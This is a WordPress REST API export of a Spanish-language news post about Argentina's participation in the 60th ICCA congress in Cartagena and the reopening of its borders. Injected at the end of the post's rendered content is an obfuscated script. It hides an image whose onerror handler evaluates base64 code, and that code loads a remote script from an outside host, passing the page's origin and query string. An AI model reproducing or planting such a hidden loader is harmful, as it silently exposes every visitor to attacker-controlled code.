{"id":4824,"date":"2021-10-29T13:32:12","date_gmt":"2021-10-29T16:32:12","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4824"},"modified":"2025-08-13T16:26:11","modified_gmt":"2025-08-13T19:26:11","slug":"turismo-mice-argentina-consolido-su-liderazgo-en-la-region-durante-el-60-congreso-mundial-de-icca","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4824","title":{"rendered":"TURISMO MICE: ARGENTINA CONSOLID\u00d3 SU LIDERAZGO EN LA REGI\u00d3N DURANTE EL 60\u00b0 CONGRESO MUNDIAL DE ICCA"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\">El pa\u00eds fue uno de los grandes protagonistas del encuentro en Cartagena, Colombia, del 24 al 27 de octubre, en el cual\u00a0<em><strong>Visit Argentina<\/strong><\/em>\u00a0<strong>fue patrocinador de la Cena de Cierre en la hist\u00f3rica Ciudad Amurallada<\/strong>.\u00a0<\/h4>\n\n\n\n<p><em>\u201cTenemos un gran entusiasmo por la reapertura de fronteras de Argentina\u201d<\/em>. Esta frase replicada por gran parte de los m\u00e1s de 200 delegados presentes en Colombia sintetiz\u00f3 la participaci\u00f3n de Argentina en el Congreso.<\/p>\n\n\n\n<p>Organizado a trav\u00e9s de hubs globales en Par\u00eds, Abu Dhabi, Se\u00fal y Nagasaki, y el evento principal en Cartagena, el congreso tuvo 950 asistentes presenciales m\u00e1s 300 participantes que se conectaron de manera digital.&nbsp; Con referentes de 83 pa\u00edses, el congreso cont\u00f3 tambien con la participaci\u00f3n de 300 asociaciones internacionales en todas las modalidades y un intenso programa acad\u00e9mico&nbsp;y de reuniones con las asociaciones invitadas.<\/p>\n\n\n\n<p><strong>A partir del 1 de noviembre, el pa\u00eds vuelve a abrir sus fronteras a todos los y las viajeras del mundo<\/strong>&nbsp;y, en este sentido, al contar con una geograf\u00eda notable, grandes \u00e1reas naturales y condiciones econ\u00f3micas muy favorables para el turismo internacional, Argentina se posiciona de excelente manera.<br><br><em>\u201cEsta participaci\u00f3n en el Congreso de ICCA nos dio la posibilidad de comunicar la reapertura de nuestras fronteras y, adem\u00e1s, generar encuentros con protagonistas del sector MICE de distintas regiones del mundo. De esta manera, 2022 se avecina muy positivo para reafirmar nuestro liderazgo en la regi\u00f3n e ir por m\u00e1s eventos internacionales en nuestro vasto territorio, que tiene todo lo que el turista necesita\u201d<\/em>, asegur\u00f3 el Secretario Ejecutivo del INPROTUR,&nbsp;<strong>Ricardo Sosa<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/ci4.googleusercontent.com\/proxy\/u6WH7Z2qoqRPbmUAv7QItaLeec9x1SE_hpVNeVj6CoC-PKeHKchjs13RhUCHTerABTF1QC7oqBhkF5TOyF0BACqw5wOTXK4PwQVj7cW-BynJBVbsK3uAKPKorkSXEZkqSa2DfVqi0kXJqgSRgjgSljVnTDVMvko=s0-d-e1-ft#https:\/\/mcusercontent.com\/c72ee12e8482a64a249259cc5\/images\/9c2aee2f-6988-ccd9-9af3-f72c3959ba69.jpeg\" alt=\"\" \/><\/figure>\n\n\n\n<p>Tendencias y creaci\u00f3n de experiencias para eventos con foco en el consumidor, diversidad, equidad e inclusi\u00f3n, innovaci\u00f3n, celeridad y colaboraci\u00f3n en el futuro, el impacto de la tecnolog\u00eda en la dimensi\u00f3n humana, creaci\u00f3n de ciudades sustentables para los ciudadanos del futuro, actualizaci\u00f3n del protocolo global para las reuniones asociativas fueron algunas de las tem\u00e1ticas desarrolladas.<\/p>\n\n\n\n<p><strong>Durante la Cena de Cierre del Congreso, Argentina fue patrocinador oficial<\/strong>, hecho que permiti\u00f3 que los asistentes visualizaran contenidos culturales, gastron\u00f3micos y tur\u00edsticos del pa\u00eds, con proyecciones de im\u00e1genes que invitaban a concretar proyectos a futuro.&nbsp;<em>\u201cLa marca de Visit Argentina estuvo muy presente y los invitados se mostraron entusiasmados por generar acciones en el pa\u00eds\u201d<\/em>, se\u00f1al\u00f3 el Director de Productos Tur\u00edsticos del INPROTUR,&nbsp;<strong>Pablo Sismanian<\/strong>.<\/p>\n\n\n\n<p>Cabe recordar que, luego del \u00faltimo ranking elaborado por ICCA, Argentina se mantuvo en el Top-20 de pa\u00edses organizadores de eventos y reuniones tur\u00edsticas internacionales, y que por primera vez en la historia lleg\u00f3 al liderazgo en Am\u00e9rica Latina. Adem\u00e1s, Buenos Aires finaliz\u00f3 por 11\u00aa vez consecutiva como l\u00edder en Am\u00e9rica.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/argentina.us10.list-manage.com\/track\/click?u=c72ee12e8482a64a249259cc5&amp;id=8d21e20bb6&amp;e=1f1bd49e71\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n-1024x1024.jpg\" alt=\"\" class=\"wp-image-4733\" width=\"132\" height=\"132\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n-1024x1024.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n-300x300.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n-150x150.jpg 150w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n-768x768.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n-696x696.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n-1068x1068.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n-420x420.jpg 420w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/210990346_3044772685847459_4695428346361105537_n.jpg 1081w\" sizes=\"(max-width: 132px) 100vw, 132px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El pa\u00eds fue uno de los grandes protagonistas del encuentro en Cartagena, Colombia, del 24 al 27 de octubre, en el cual\u00a0Visit Argentina\u00a0fue patrocinador de la Cena de Cierre en la hist\u00f3rica Ciudad Amurallada.\u00a0 \u201cTenemos un gran entusiasmo por la reapertura de fronteras de Argentina\u201d. Esta frase replicada por gran parte de los m\u00e1s de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4825,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4824","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4824"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4824\/revisions"}],"predecessor-version":[{"id":10756,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4824\/revisions\/10756"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4825"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}